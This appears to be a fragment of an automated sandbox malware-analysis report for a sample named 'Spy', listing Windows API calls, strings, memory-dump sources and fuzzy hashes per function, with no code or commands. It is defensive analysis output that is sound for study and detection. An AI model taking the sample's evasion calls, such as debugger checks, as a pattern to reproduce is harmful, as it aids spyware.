                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: 45f1a08b0b2f8c45f3653ea3bb62872d7ac0ce1f0c9540b0b56981c854d1ef12
                                                      • Instruction ID: 2434d53b0e052c893afc95c7c01e6df99d43c61fdcfd5c36a04f7902e3e1bffb
                                                      • Opcode Fuzzy Hash: 45f1a08b0b2f8c45f3653ea3bb62872d7ac0ce1f0c9540b0b56981c854d1ef12
                                                      • Instruction Fuzzy Hash: F421C8709047849FEB738B74C895FEABBECAF02304F44448EE6DA57281D7746984CB51
                                                      APIs
                                                        • Part of subcall function 00A949C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A927AF,?,00000001), ref: 00A949F4
                                                      • _free.LIBCMT ref: 00ACFB04
                                                      • _free.LIBCMT ref: 00ACFB4B
                                                        • Part of subcall function 00A929BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A92ADF
                                                      Strings
                                                      • Bad directive syntax error, xrefs: 00ACFB33
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                      • String ID: Bad directive syntax error
                                                      • API String ID: 2861923089-2118420937
                                                      • Opcode ID: ed8a43b03ed0a925d6fa7187147bd0c411a2e36184406c5a7e243da277ad45a6
                                                      • Instruction ID: ee2f370c5059b831a159cdd7179388dda78d306db24246ec39d44adbb0cf880b
                                                      • Opcode Fuzzy Hash: ed8a43b03ed0a925d6fa7187147bd0c411a2e36184406c5a7e243da277ad45a6
                                                      • Instruction Fuzzy Hash: E1916B71A10219AFCF04EFA4CD91EEEB7B5BF09350F11456EF816AB2A1DB309A45CB50
                                                      APIs
                                                        • Part of subcall function 00A94AB2: __fread_nolock.LIBCMT ref: 00A94AD0
                                                      • _wcscmp.LIBCMT ref: 00AE9DE1
                                                      • _wcscmp.LIBCMT ref: 00AE9DF4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: 433aab2db2a342eaeb880a30f773e082e6ec30abf2b40660509aa95a7cc9d719
                                                      • Instruction ID: 0cd6c9a101b7b1f743df88673f323275b6407b770727c518d9ff3ff4b2016e80
                                                      • Opcode Fuzzy Hash: 433aab2db2a342eaeb880a30f773e082e6ec30abf2b40660509aa95a7cc9d719
                                                      • Instruction Fuzzy Hash: 2141F872A40349BADF20EBA5CC45FEF77FDDF49710F00446AFA00A7291D67199058764
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AD032B
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00AD0375
                                                        • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                        • Part of subcall function 00AA09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AA09E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      • API String ID: 3777226403-3081909835
                                                      • Opcode ID: b23c11b563842ae8c936e7ab56465160b8bfb0556a05a5cfbbe8074357445ccc
                                                      • Instruction ID: bf4bcfddf0cc8b1f7f13ad3c043b40bfe373e95ffee665ad3288ffa53cd4228b
                                                      • Opcode Fuzzy Hash: b23c11b563842ae8c936e7ab56465160b8bfb0556a05a5cfbbe8074357445ccc
                                                      • Instruction Fuzzy Hash: 4C219371A002989BDF41DF94C845BEE7BFCAF49300F10405AE405AB281DBB45A88DFA1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4df1a17df12034d0d3b802e69ad27c43391bee503d585affca226a6ed9a4614c
                                                      • Instruction ID: 7073dba45ca925c7e9318dbc020a0177d1c4abced0bd9f47e163cbb674f95284
                                                      • Opcode Fuzzy Hash: 4df1a17df12034d0d3b802e69ad27c43391bee503d585affca226a6ed9a4614c
                                                      • Instruction Fuzzy Hash: 44F158706083459FC715EF68C580A6ABBE6FF88314F14892EF9999B351DB30E945CF82
                                                      APIs
                                                        • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA07EC
                                                        • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA07F4
                                                        • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA07FF
                                                        • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA080A
                                                        • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA0812
                                                        • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA081A
                                                        • Part of subcall function 00A9FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A8AC6B), ref: 00A9FFA7
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A8AD08
                                                      • OleInitialize.OLE32(00000000), ref: 00A8AD85
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AC2F56
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: b9d705b28f7bf60f09c0ac731529a1f8f35173a413452facb1e4fcb4a1bf8c1e
                                                      • Instruction ID: 3c4b98b73b8a409178b193d3ab379d35634962d58b7c5eebf0d85ca70a4fcba4
                                                      • Opcode Fuzzy Hash: b9d705b28f7bf60f09c0ac731529a1f8f35173a413452facb1e4fcb4a1bf8c1e
                                                      • Instruction Fuzzy Hash: 0781ECB9A9C2408FC384EF39AD446657FE8FB5A31435089AAD418C7372EF300A49DF94
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A959F9
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A95A9E
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A95ABB
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      • Opcode ID: 3392c8e2d911915b522ed3a01b7a1fa975dd161797bdfcb0ce78d07d0ceb4b47
                                                      • Instruction ID: 534e0e9a215835a714b938f2f504c9a0ea7e5f1b9fe8d750e8796cfc95960e9b
                                                      • Opcode Fuzzy Hash: 3392c8e2d911915b522ed3a01b7a1fa975dd161797bdfcb0ce78d07d0ceb4b47
                                                      • Instruction Fuzzy Hash: 57319974A057018FDB21DF34D8C9697BBF4FB4A344F000A2EF69A87250DBB1A944CB56
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00AA5953
                                                        • Part of subcall function 00AAA39B: __NMSG_WRITE.LIBCMT ref: 00AAA3C2
                                                        • Part of subcall function 00AAA39B: __NMSG_WRITE.LIBCMT ref: 00AAA3CC
                                                      • __NMSG_WRITE.LIBCMT ref: 00AA595A
                                                        • Part of subcall function 00AAA3F8: GetModuleFileNameW.KERNEL32(00000000,00B453BA,00000104,00000004,00000001,00AA1003), ref: 00AAA48A
                                                        • Part of subcall function 00AAA3F8: ___crtMessageBoxW.LIBCMT ref: 00AAA538
                                                        • Part of subcall function 00AA32CF: ___crtCorExitProcess.LIBCMT ref: 00AA32D5
                                                        • Part of subcall function 00AA32CF: ExitProcess.KERNEL32 ref: 00AA32DE
                                                        • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                      • RtlAllocateHeap.NTDLL(01380000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: 7796bb318a61f804231a6843417501fdeba8b68dd3db4ea0eb27d8b485577bfc
                                                      • Instruction ID: 9f90a04531d1d2afcbf27843da9120a9f1e883670100dce9422282e7f93a0bad
                                                      • Opcode Fuzzy Hash: 7796bb318a61f804231a6843417501fdeba8b68dd3db4ea0eb27d8b485577bfc
                                                      • Instruction Fuzzy Hash: 4101D236A01F02EFEA152B349902A6F33589F53770F51042BF514AF1D2DFB08D404669
                                                      APIs
                                                      • _free.LIBCMT ref: 00AE92D6
                                                        • Part of subcall function 00AA2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2F99
                                                        • Part of subcall function 00AA2F85: GetLastError.KERNEL32(00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2FAB
                                                      • _free.LIBCMT ref: 00AE92E7
                                                      • _free.LIBCMT ref: 00AE92F9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                      • Instruction ID: 96d889ea7ad0cd6f1fa102ddfb50637997f48cdd2bf422d3839e25c8bdfb557c
                                                      • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                      • Instruction Fuzzy Hash: 78E0C2A12047025BCE20AB3D6A40FE777EC0F88311B14040DB509D3182CF20E8608228
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: 4167996e45ce1d92f360b9f10180c524af34cb8dfc7f153cea4a28e61aecbf13
                                                      • Instruction ID: 80c9c12b20d0aa93fcdfa3e436e25c35eba3435cbf869b002988999b435959ea
                                                      • Opcode Fuzzy Hash: 4167996e45ce1d92f360b9f10180c524af34cb8dfc7f153cea4a28e61aecbf13
                                                      • Instruction Fuzzy Hash: 98325874608341DFDB24EF24C594A6ABBF1BF84344F15896DE88A9B362D731EC45CB82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: EA06
                                                      • API String ID: 4104443479-3962188686
                                                      • Opcode ID: 43f9847e0d59c24a3c85332b24978b90315b54145a87de78ee67723e1edc0a41
                                                      • Instruction ID: 99f5eb2fd800f175c8661555911cbeba80e9fd498d8e547ed4dadf7df7e15572
                                                      • Opcode Fuzzy Hash: 43f9847e0d59c24a3c85332b24978b90315b54145a87de78ee67723e1edc0a41
                                                      • Instruction Fuzzy Hash: B0416A32F042585BDF219B648951FBF7FF58B5E300F684075E882EB386D6208D8693E2
                                                      APIs
                                                      • _strcat.LIBCMT ref: 00AFE20C
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                      • _wcscpy.LIBCMT ref: 00AFE29B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf_strcat_wcscpy
                                                      • String ID:
                                                      • API String ID: 1012013722-0
                                                      • Opcode ID: 4b268954e1d747ad72aa9fbf09e9e4056c870071c58c02ef57f8698c7b546aae
                                                      • Instruction ID: 6ec6bc70f411e8e53f1e9663a145d43fa9f67ac4ed0e74a6b0dee7ab0130d6d3
                                                      • Opcode Fuzzy Hash: 4b268954e1d747ad72aa9fbf09e9e4056c870071c58c02ef57f8698c7b546aae
                                                      • Instruction Fuzzy Hash: 8D912735A00608DFCB28EF68C5859A9B7F5FF59310B55815AF90A8F3A2DB30ED51CB81
                                                      APIs
                                                      • CloseHandle.KERNEL32 ref: 00AA0ED5
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00AA0EE7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3280610774-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: faf0e8abd85e8a6ad99b83854a581be77d23f9226f929786359fd89049be1482
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: B031C571A00109DFDB28DF58C480969FBB6FF5A300B648AA5E409DB291E731EDC1DBC0
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 00A95FEF
                                                        • Part of subcall function 00AA359C: __lock.LIBCMT ref: 00AA35A2
                                                        • Part of subcall function 00AA359C: DecodePointer.KERNEL32(00000001,?,00A96004,00AD8892), ref: 00AA35AE
                                                        • Part of subcall function 00AA359C: EncodePointer.KERNEL32(?,?,00A96004,00AD8892), ref: 00AA35B9
                                                        • Part of subcall function 00A95F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A95F18
                                                        • Part of subcall function 00A95F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A95F2D
                                                        • Part of subcall function 00A95240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A9526C
                                                        • Part of subcall function 00A95240: IsDebuggerPresent.KERNEL32 ref: 00A9527E
                                                        • Part of subcall function 00A95240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A952E6
                                                        • Part of subcall function 00A95240: SetCurrentDirectoryW.KERNEL32(?), ref: 00A95366
                                                      • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00A9602F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 1438897964-0
                                                      • Opcode ID: 95b4ed0e87b1f3f4ea78951d903415ee9dd0b63a5310bdd6718c992230dca05b
                                                      • Instruction ID: 98b4262840d1a1a71c66b6c879fbe8d72cd1dc63fcaad8cb08865a88c9542512
                                                      • Opcode Fuzzy Hash: 95b4ed0e87b1f3f4ea78951d903415ee9dd0b63a5310bdd6718c992230dca05b
                                                      • Instruction Fuzzy Hash: 99115E759083029BC711EF69ED4594ABBE8FF9A750F00891EF485872A1DFB09A44CF92
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00A93E72,?,?,?,00000000), ref: 00A94327
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00A93E72,?,?,?,00000000), ref: 00AD0717
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: ea89e097f020d5e50f65688e1598472f1341ad18f79eb9c7add358bf13edbce6
                                                      • Instruction ID: f1eb434af676f5d9c3dce304a3ff6b8390e81bfe0962f15d4802803a82ff4240
                                                      • Opcode Fuzzy Hash: ea89e097f020d5e50f65688e1598472f1341ad18f79eb9c7add358bf13edbce6
                                                      • Instruction Fuzzy Hash: E9014470244209BEF7241E248C86FA67ADCEB05768F50C315BAE56A1D0DAB55C568B14
                                                      APIs
                                                        • Part of subcall function 00AA593C: __FF_MSGBANNER.LIBCMT ref: 00AA5953
                                                        • Part of subcall function 00AA593C: __NMSG_WRITE.LIBCMT ref: 00AA595A
                                                        • Part of subcall function 00AA593C: RtlAllocateHeap.NTDLL(01380000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F
                                                      • std::exception::exception.LIBCMT ref: 00AA101C
                                                      • __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                        • Part of subcall function 00AA87CB: RaiseException.KERNEL32(?,?,?,00B3CAF8,?,?,?,?,?,00AA1036,?,00B3CAF8,?,00000001), ref: 00AA8820
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
                                                      • Opcode ID: b9776d81190ba80065ba9c5b5f5b4b1e00f2720d247f70e2e3a56b731adb7415
                                                      • Instruction ID: c29012550bc96f7a9a38a9381752da7bd97df58876ccca8df5265c61e2648757
                                                      • Opcode Fuzzy Hash: b9776d81190ba80065ba9c5b5f5b4b1e00f2720d247f70e2e3a56b731adb7415
                                                      • Instruction Fuzzy Hash: 02F0A47650421DB6CB21ABA8ED159DE7BFC9F02760F50446AF814A72D1EFB18BC0C2A4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
